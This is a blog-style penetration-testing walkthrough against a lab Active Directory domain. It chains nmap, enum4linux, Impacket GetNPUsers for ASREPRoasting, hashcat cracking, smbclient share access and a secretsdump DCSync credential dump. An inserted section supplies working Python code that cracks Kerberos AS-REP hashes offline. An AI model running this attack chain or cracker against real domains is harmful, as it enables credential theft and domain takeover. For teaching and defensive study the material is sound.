Decrypting Defenses: Basic Techniques to Penetrate Active Directory Systems
Introduction
In this exploration, I aim to demonstrate a basic penetration test against an Active Directory (AD) setup, showing how a system that looks robust from the outside can still contain exploitable misconfigurations. The walkthrough starts with initial reconnaissance using nmap, a cornerstone network-scanning tool, and progresses through more specialised tools and tactics. Let's look at each tool and the role it plays in uncovering the weaknesses of the target.
Step 1: Initial Network Scanning with Nmap
Tool Used: Nmap (Network Mapper)
Nmap is a powerful network scanning tool that provides comprehensive information about network environments, including open ports, services, and, crucially for this exercise, details about networked systems such as the AD domain name.
Command:
nmap -sV -p 139,445 target_IP
-sV: Probe the open ports to determine service and version information. For port 445, nmap's SMB probe also reports the host's workgroup or domain name in the service info, which is how the domain name is recovered below.
-p 139,445: Scan only the SMB ports (139 is NetBIOS session service, 445 is SMB directly over TCP), which every domain-joined Windows host and domain controller exposes.
Key Outcomes:
- Identified the AD domain name “MYSTIC-AD,” crucial for subsequent targeted attacks.
- Verified open SMB ports (139 and 445), confirming potential entry points for exploitation.
Step 2: Enumerating SMB with Enum4Linux
Following the network mapping, enum4linux was used to enumerate the SMB service in depth. It wraps the Samba tools (rpcclient, smbclient, net and nmblookup) and, where the target allows null or guest sessions, pulls out users, groups, shares and password-policy details from the Windows networking and Active Directory services.
Tool Used: Enum4Linux
Command:
enum4linux -a target_IP
-a: Automates all basic enumeration functions to gather extensive details about users, groups, and more.
Significant Findings:
- Detailed listings of user accounts and SMB shares, notably identifying the svc-elite and backup-pro accounts. The service-style naming makes svc-elite an obvious first candidate for the Kerberos checks that follow.
Step 3: Exploiting Kerberos with ASREPRoasting
Kerberos, the default authentication protocol for Windows domains, was targeted next. Normally a client must prove knowledge of the user's password (pre-authentication) before the KDC issues a ticket. If pre-authentication is disabled on an account (the DONT_REQ_PREAUTH flag in userAccountControl), the KDC hands an AS-REP for that account to anyone who asks. Part of that reply is encrypted with a key derived from the user's password, so it can be taken away and cracked offline with no further interaction with the domain and no lockout risk. That attack is ASREPRoasting.
Tool Used: GetNPUsers from Impacket Suite
Command:
GetNPUsers.py -no-pass -dc-ip target_IP domain/svc-elite
-no-pass: Do not prompt for a password; send the AS-REQ without any pre-authentication data. If the account has pre-authentication disabled, the KDC answers with an AS-REP, which the tool prints in hashcat format ($krb5asrep$23$...) by default.
-dc-ip: The domain controller (KDC) to send the request to.
domain/svc-elite: The target account, in domain/user form. With -usersfile the same check can be run against the whole user list gathered in Step 2.
Outcome:
- Successfully obtained an AS-REP for svc-elite. Its encrypted part, written out as a $krb5asrep$23$ hash, is the material to be cracked offline. The "23" is the encryption type: RC4-HMAC, whose key is simply the user's NT hash.
Step 4: Cracking Hashes with Hashcat
Upon obtaining the Kerberos hash, hashcat was employed to crack it offline: for each candidate password it derives the corresponding key, decrypts the AS-REP and checks whether the embedded checksum verifies. A match reveals the user's password.
Tool Used: Hashcat
Command:
hashcat -m 18200 -a 0 hash.txt wordlist.txt
-m 18200: Hash mode for Kerberos 5 etype 23 AS-REP, the $krb5asrep$23$ format that GetNPUsers produces. If RC4 is disabled in the domain and the AS-REP comes back with an AES etype (17 or 18) instead, a different mode is needed and cracking is considerably slower.
-a 0: Straight (dictionary) attack, trying each line of the wordlist in turn.
Cracked Password:
- “Vanguard123”, highlighting the need for stronger password policies.
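Steps 3 and 4 together, as an added example that is not part of the original post: a pure-Python re-implementation of the check that hashcat mode 18200 performs for each candidate password, so the reader can see exactly why a missing pre-authentication requirement makes the AS-REP crackable offline. It derives the NT hash (MD4 over the UTF-16LE password), the RFC 4757 message key for key usage 8 (the AS-REP enc-part), RC4-decrypts the ciphertext and verifies the HMAC-MD5 checksum. The $krb5asrep$23$ hash it cracks is constructed locally by encrypting a placeholder enc-part under the walkthrough's password "Vanguard123" for svc-elite in MYSTIC-AD; a real hash would come from GetNPUsers.py. The wordlist is constructed as well.

```python
"""ASREPRoast offline check for a Kerberos etype-23 (RC4-HMAC) AS-REP hash.
Added example, not code from the original post; mirrors hashcat -m 18200 -a 0."""
import hashlib
import hmac
import os
import struct
from typing import Iterable, Optional, Tuple

MASK = 0xFFFFFFFF
AS_REP_KEY_USAGE = 8  # RFC 4757 message type "T" for the AS-REP enc-part


def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320); OpenSSL 3 builds often disable hashlib's md4."""
    f = lambda x, y, z: (x & y) | (~x & z)
    g = lambda x, y, z: (x & y) | (x & z) | (y & z)
    h = lambda x, y, z: x ^ y ^ z
    rotl = lambda x, n: ((x << n) | (x >> (32 - n))) & MASK
    bit_len = len(data) * 8
    data += b"\x80" + b"\x00" * ((55 - len(data)) % 64) + struct.pack("<Q", bit_len)
    a0, b0, c0, d0 = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    for off in range(0, len(data), 64):
        x = struct.unpack("<16I", data[off:off + 64])
        a, b, c, d = a0, b0, c0, d0
        for i in range(16):  # round 1: words in order, shifts 3/7/11/19
            a, b, c, d = d, rotl((a + f(b, c, d) + x[i]) & MASK, (3, 7, 11, 19)[i % 4]), b, c
        for i in range(16):  # round 2: column order, shifts 3/5/9/13
            k = (i % 4) * 4 + i // 4
            a, b, c, d = d, rotl((a + g(b, c, d) + x[k] + 0x5A827999) & MASK, (3, 5, 9, 13)[i % 4]), b, c
        for i in range(16):  # round 3: bit-reversed order, shifts 3/9/11/15
            k = (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)[i]
            a, b, c, d = d, rotl((a + h(b, c, d) + x[k] + 0x6ED9EBA1) & MASK, (3, 9, 11, 15)[i % 4]), b, c
        a0, b0, c0, d0 = (a0 + a) & MASK, (b0 + b) & MASK, (c0 + c) & MASK, (d0 + d) & MASK
    return struct.pack("<4I", a0, b0, c0, d0)


def nt_hash(password: str) -> bytes:
    """NT hash = MD4(UTF-16LE(password)); for etype 23 this IS the Kerberos key."""
    return md4(password.encode("utf-16le"))


def rc4(key: bytes, data: bytes) -> bytes:
    s, j = list(range(256)), 0
    for i in range(256):  # key scheduling
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:  # keystream XOR; encryption and decryption are the same op
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def message_key(nt: bytes) -> bytes:
    """RFC 4757 K1 = HMAC-MD5(K, T) with T as 4-byte little-endian; K is the NT hash."""
    return hmac.new(nt, struct.pack("<I", AS_REP_KEY_USAGE), hashlib.md5).digest()


def asrep_encrypt(password: str, plaintext: bytes) -> Tuple[bytes, bytes]:
    """RFC 4757 encryption as the KDC does it; used here only to build the sample."""
    k1 = message_key(nt_hash(password))
    confounded = os.urandom(8) + plaintext  # 8-byte random confounder prefix
    checksum = hmac.new(k1, confounded, hashlib.md5).digest()
    k3 = hmac.new(k1, checksum, hashlib.md5).digest()
    return checksum, rc4(k3, confounded)


def check_asrep(hash_line: str, password: str) -> bool:
    """True if `password` decrypts a $krb5asrep$23$user@REALM:checksum$edata line."""
    header, body = hash_line.rsplit(":", 1)
    if not header.startswith("$krb5asrep$23$"):
        raise ValueError("not an etype-23 AS-REP hash: " + header)
    checksum_hex, edata_hex = body.split("$", 1)
    checksum, edata = bytes.fromhex(checksum_hex), bytes.fromhex(edata_hex)
    k1 = message_key(nt_hash(password))
    k3 = hmac.new(k1, checksum, hashlib.md5).digest()
    plaintext = rc4(k3, edata)  # wrong password -> garbage, so the HMAC will not match
    return hmac.compare_digest(hmac.new(k1, plaintext, hashlib.md5).digest(), checksum)


def crack_asrep(hash_line: str, wordlist: Iterable[str]) -> Optional[str]:
    """Dictionary attack (hashcat -a 0): first candidate that verifies, else None."""
    for candidate in wordlist:
        candidate = candidate.rstrip("\r\n")
        if candidate and check_asrep(hash_line, candidate):
            return candidate
    return None


# CONSTRUCTED sample (assumption): a placeholder enc-part encrypted under the
# walkthrough's password. A real hash is what GetNPUsers.py prints.
_CHECKSUM, _EDATA = asrep_encrypt("Vanguard123", b"EncASRepPart placeholder bytes")
SAMPLE_HASH = "$krb5asrep$23$svc-elite@MYSTIC-AD:%s$%s" % (_CHECKSUM.hex(), _EDATA.hex())
SAMPLE_WORDLIST = ["password", "Welcome1", "Vanguard123", "Summer2024!"]  # constructed

if __name__ == "__main__":
    print(crack_asrep(SAMPLE_HASH, SAMPLE_WORDLIST))  # Vanguard123
```

The whole attack is unauthenticated and offline after the single AS-REQ, which is why it leaves no failed-logon events and why password strength is the only thing standing between a DONT_REQ_PREAUTH account and its cleartext password. Real-world hashcat is orders of magnitude faster than this loop, but the per-candidate work is identical.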
Step 5: Accessing SMB Shares with Smbclient
With valid credentials in hand, smbclient was utilized to explore and manipulate SMB shares directly, searching for sensitive information or further network access points.
Tool Used: Smbclient
Command:
smbclient -L //target_IP -U svc-elite
-L: List the shares available on the target (the server is given in //host form; the backslash form needs escaping from a Unix shell).
-U: Authenticate with the cracked credentials; smbclient prompts for the password. Listing only shows the share names; reading a share means connecting to //target_IP/share with the same -U flag.
Key Discovery:
- Accessed critical files within the backup-pro share, potentially leading to further network compromise.
Step 6: Full Domain Control with Secretsdump.py
Achieving full domain control was the final goal, accomplished by dumping credential material from the domain controller with secretsdump.py. Against a DC it uses the directory replication service (DRSUAPI, the DCSync technique) to pull account secrets out of NTDS.dit, so it needs credentials that hold replication rights on the domain, typically a Domain Admin or an account granted "Replicating Directory Changes" permissions.
Tool Used: Secretsdump.py from Impacket Suite
Command:
secretsdump.py -just-dc-user admin domain/privileged_user:password@target_IP
-just-dc-user: Extract the NTDS secrets (NT hash and Kerberos keys) for only the named domain user, here admin, rather than every account in the domain. This option only works with the DRSUAPI method.
domain/privileged_user:password@target_IP: The account used to authenticate to the DC, in Impacket's domain/user:password@host form, and the DC's address. The original command omitted the credentials, which secretsdump.py requires; the placeholder stands for whichever replication-capable account was obtained during the engagement.
Conclusion
This exercise illustrated how various tools can be systematically used to expose and exploit vulnerabilities in a hardened AD environment. Each tool brought us closer to understanding the security posture and necessary defenses required to protect such critical systems.
Mayank Nauni, Cybersecurity Researcher
Join the discussion on effective strategies for securing AD environments. Reach out with your insights or queries, and let’s enhance our collective cybersecurity knowledge together!